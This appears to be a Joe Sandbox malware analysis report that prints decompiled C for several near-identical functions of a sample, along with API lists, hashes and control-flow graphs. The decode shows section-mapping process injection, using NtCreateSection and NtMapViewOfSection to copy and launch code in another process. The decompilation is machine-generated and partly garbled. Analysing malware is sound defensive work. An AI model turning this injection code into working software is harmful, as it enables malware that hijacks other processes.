                                                          • Opcode Fuzzy Hash: 6e59b7e5303ef17d3f4c775c21a888ce17b01420e14e5236be6b7b92dd2dae58
                                                          • Instruction Fuzzy Hash: 29512971900245BFEB219F91CC49FEF7BB9EF85B00F10412AFA11AA2A5D7709941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 170nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 240 4014bf-4014c4 244 4014db 240->244 245 4014cc-4014f1 call 40119e 240->245 244->245 249 4014f3 245->249 250 4014f6-4014fb 245->250 249->250 252 401501-401512 250->252 253 401824-40182c 250->253 257 401822 252->257 258 401518-401541 252->258 253->250 256 401831-401842 253->256 260 401845-401866 call 40119e 256->260 261 401838-40183e 256->261 257->256 258->257 267 401547-40155e NtDuplicateObject 258->267 261->260 267->257 269 401564-401588 NtCreateSection 267->269 271 4015e4-40160a NtCreateSection 269->271 272 40158a-4015ab NtMapViewOfSection 269->272 271->257 275 401610-401614 271->275 272->271 274 4015ad-4015c9 NtMapViewOfSection 272->274 274->271 276 4015cb-4015e1 274->276 275->257 277 40161a-40163b NtMapViewOfSection 275->277 276->271 277->257 278 401641-40165d NtMapViewOfSection 277->278 278->257 280 401663 call 401668 278->280
                                                          C-Code - Quality: 62%
                                                          			E004014BF(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t183;
				intOrPtr* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				void* _t193;
				intOrPtr* _t196;
				void* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				asm("invalid");
				_t84 = 0x14e3;
				_push(0x37f);
				_t130 =  *_t203;
				_t204 = _t203 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
				_t183 = _t201 - 0x60;
				 *_t183 = _t174;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 = _t201 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t174;
					_t185 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_push(_t201 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t201 - 8) = _t174;
						_t98 = _t201 - 0x50;
						 *(_t98 + 4) = _t174;
						 *_t98 = 0x5000;
						_t186 = _t201 - 0x54;
						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t121 = _t201 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t201 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *(_t201 - 8) =  *(_t201 - 8) + 1;
								}
							}
						}
						_t100 = _t201 - 0x50;
						 *(_t100 + 4) = _t174;
						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t102 = _t201 - 0x48;
							 *_t102 = _t174;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t104 = _t201 - 0x40;
								 *_t104 = _t174;
								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
								if(_t224 == 0) {
									L21();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t159 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc2");
									_t161 = _t160 ^ 0xbcc951dd;
									_t204 = _t209 - _t161;
									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t139 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t162 = _t192;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t229 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t193);
										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
										__eflags = _t196;
										while(1) {
											__eflags =  *_t196;
											if( *_t196 == 0) {
												break;
											}
											_t176 =  *_t196;
											_t196 = _t196 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t197);
										_t174 = 0;
										__eflags = 0;
										_t108 = _t201 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
									} else {
										L54();
										_pop(_t177);
										_t174 = _t177 - 0x1760;
										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t174, _t229);
			}














































                                                          0x004014bf
                                                          0x004014bc
                                                          0x004014cc
                                                          0x004014d1
                                                          0x004014d4
                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                                                          • Instruction ID: 07d304ea65bb56911e0060c1c25482d61d12f4ba10f26ae25195bb01424c625b
                                                          • Opcode Fuzzy Hash: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                                                          • Instruction Fuzzy Hash: 345106B1900245BFEB219F91CC48FEBBBB9EF85B10F104129FA11AA2E5D7749941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014DA Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 282 4014da-4014f1 call 40119e 288 4014f3 282->288 289 4014f6-4014fb 282->289 288->289 291 401501-401512 289->291 292 401824-40182c 289->292 296 401822 291->296 297 401518-401541 291->297 292->289 295 401831-401842 292->295 299 401845-401866 call 40119e 295->299 300 401838-40183e 295->300 296->295 297->296 306 401547-40155e NtDuplicateObject 297->306 300->299 306->296 308 401564-401588 NtCreateSection 306->308 310 4015e4-40160a NtCreateSection 308->310 311 40158a-4015ab NtMapViewOfSection 308->311 310->296 314 401610-401614 310->314 311->310 313 4015ad-4015c9 NtMapViewOfSection 311->313 313->310 315 4015cb-4015e1 313->315 314->296 316 40161a-40163b NtMapViewOfSection 314->316 315->310 316->296 317 401641-40165d NtMapViewOfSection 316->317 317->296 319 401663 call 401668 317->319
                                                          C-Code - Quality: 62%
                                                          			E004014DA(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t183;
				intOrPtr* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				void* _t193;
				intOrPtr* _t196;
				void* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				_pop(_t84);
				_push(0x37f);
				_t130 =  *_t203;
				_t204 = _t203 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
				_t183 = _t201 - 0x60;
				 *_t183 = _t174;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 = _t201 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t174;
					_t185 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_push(_t201 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t201 - 8) = _t174;
						_t98 = _t201 - 0x50;
						 *(_t98 + 4) = _t174;
						 *_t98 = 0x5000;
						_t186 = _t201 - 0x54;
						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t121 = _t201 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t201 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *(_t201 - 8) =  *(_t201 - 8) + 1;
								}
							}
						}
						_t100 = _t201 - 0x50;
						 *(_t100 + 4) = _t174;
						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t102 = _t201 - 0x48;
							 *_t102 = _t174;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t104 = _t201 - 0x40;
								 *_t104 = _t174;
								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
								if(_t224 == 0) {
									L18();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t159 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc2");
									_t161 = _t160 ^ 0xbcc951dd;
									_t204 = _t209 - _t161;
									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t139 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t162 = _t192;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t229 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t193);
										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
										__eflags = _t196;
										while(1) {
											__eflags =  *_t196;
											if( *_t196 == 0) {
												break;
											}
											_t176 =  *_t196;
											_t196 = _t196 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t197);
										_t174 = 0;
										__eflags = 0;
										_t108 = _t201 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
									} else {
										L51();
										_pop(_t177);
										_t174 = _t177 - 0x1760;
										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t174, _t229);
			}














































                                                          0x004014da
                                                          0x004014cc
                                                          0x004014d1
                                                          0x004014d4
                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.430379965.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_cgjtubb.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                                                          • Instruction ID: fcafa90473e3bce6dbc0f334a66e4de9b25c1110b2005182b8d4e3deb893a7aa
                                                          • Opcode Fuzzy Hash: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                                                          • Instruction Fuzzy Hash: 515107B1900245BFEB219F91CC48FEFBBB9EF85B10F104129FA11AA2A5D7709945CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014DD Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 4014dd-4014f1 call 40119e 325 4014f3 321->325 326 4014f6-4014fb 321->326 325->326 328 401501-401512 326->328 329 401824-40182c 326->329 333 401822 328->333 334 401518-401541 328->334 329->326 332 401831-401842 329->332 336 401845-401866 call 40119e 332->336 337 401838-40183e 332->337 333->332 334->333 343 401547-40155e NtDuplicateObject 334->343 337->336 343->333 345 401564-401588 NtCreateSection 343->345 347 4015e4-40160a NtCreateSection 345->347 348 40158a-4015ab NtMapViewOfSection 345->348 347->333 351 401610-401614 347->351 348->347 350 4015ad-4015c9 NtMapViewOfSection 348->350 350->347 352 4015cb-4015e1 350->352 351->333 353 40161a-40163b NtMapViewOfSection 351->353 352->347 353->333 354 401641-40165d NtMapViewOfSection 353->354 354->333 356 401663 call 401668 354->356
                                                          C-Code - Quality: 63%
                                                          			E004014DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				void* _t163;
				intOrPtr* _t164;
				void* _t167;
				long _t175;
				intOrPtr _t177;
				void* _t178;
				long* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t193;
				void* _t194;
				intOrPtr* _t197;
				void* _t198;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				L0040119E(_t84, __ecx, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t202 + 8));
				_t175 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t87;
				_t184 = _t202 - 0x60;
				 *_t184 = _t175;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t184);
				_t90 =  *_t184;
				if(_t90 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t175;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t175, _t175, 2) == 0) {
						 *(_t202 - 8) = _t175;
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t175;
						 *_t98 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t175, _t98, 4, 0x8000000, _t175) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t121 = _t202 - 0x44;
							 *_t121 = _t175;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t121, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
								_t123 = _t202 - 0x3c;
								 *_t123 = _t175;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t123, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
